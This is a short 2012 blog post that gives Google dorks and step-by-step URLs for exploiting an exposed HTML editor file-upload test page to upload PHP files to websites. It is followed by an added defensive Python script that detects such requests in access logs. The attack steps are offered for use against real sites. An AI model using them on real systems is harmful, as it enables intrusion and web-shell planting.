Thursday, 26 January 2012

HTML Editor File Upload Vulnerability

Google Dork:
inurl:/HTMLEditor/editor/
or
"inurl:/HTMLEditor/editor//filemanager/"
or
"inurl:/HTMLEditor/editor//filemanager//connectors/"

Exploit: 
http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or  
http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html

Go to http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html, change the connector to .php (like FCKeditor) and upload your file.


Supported files: .txt and .jpg; on some sites you can upload .html and .php too.

To view your file, go to: http://website/PowerCMS%20folder/files/your file here
or http://website/path//PowerCMS%20folder/files/your file here
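
From the defender's side, the requests described above leave a recognizable trail in web server access logs. The following is an added example (not part of the original post) that flags them in Common Log Format lines; the sample log lines, IP addresses, the `x.php` connector name and `note.php` are constructed, and the `/files/` upload directory is assumed from the URLs above.

```python
import re
from urllib.parse import unquote

# Common Log Format: ip ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Tolerates the doubled slashes seen in the dorks above.
CONNECTOR_RE = re.compile(r'/editor/+filemanager/+connectors/', re.I)
# Assumption: uploads land under a /files/ directory, as in the post's URLs.
RISKY_UPLOAD_RE = re.compile(r'/files/.*\.(php|html?)$', re.I)

def classify(line):
    """Return (ip, finding, path) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, raw_path, status = m.groups()
    path = unquote(raw_path.split('?', 1)[0])  # drop query, decode %20 etc.
    if CONNECTOR_RE.search(path):
        if path.lower().endswith('/uploadtest.html'):
            kind = 'test-page-exposed' if status == '200' else 'test-page-probe'
        elif method == 'POST':
            kind = 'connector-upload'
        else:
            kind = 'connector-access'
        return (ip, kind, path)
    # A script-capable file served from the upload directory.
    if status == '200' and RISKY_UPLOAD_RE.search(path):
        return (ip, 'served-uploaded-script', path)
    return None

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation IP ranges, made-up file names).
SAMPLE = [
    '203.0.113.7 - - [26/Jan/2012:10:01:02 +0000] "GET /HTMLEditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 5120',
    '203.0.113.7 - - [26/Jan/2012:10:01:40 +0000] "POST /HTMLEditor/editor/filemanager/connectors/x.php?Type=File HTTP/1.1" 200 310',
    '203.0.113.7 - - [26/Jan/2012:10:02:05 +0000] "GET /PowerCMS%20folder/files/note.php HTTP/1.1" 200 42',
    '198.51.100.9 - - [26/Jan/2012:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 900',
    '198.51.100.9 - - [26/Jan/2012:10:04:00 +0000] "GET /path/HTMLEditor/editor//filemanager//connectors/uploadtest.html HTTP/1.1" 404 0',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE):
        print(*finding, sep='  ')
```

A `test-page-exposed` finding means the upload test page is still deployed and reachable; removing it and restricting the connectors directory takes away the entry point the post relies on.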


Convex Coders © 2011 Convex-Coders. Supported by Code 104 and tech PANELS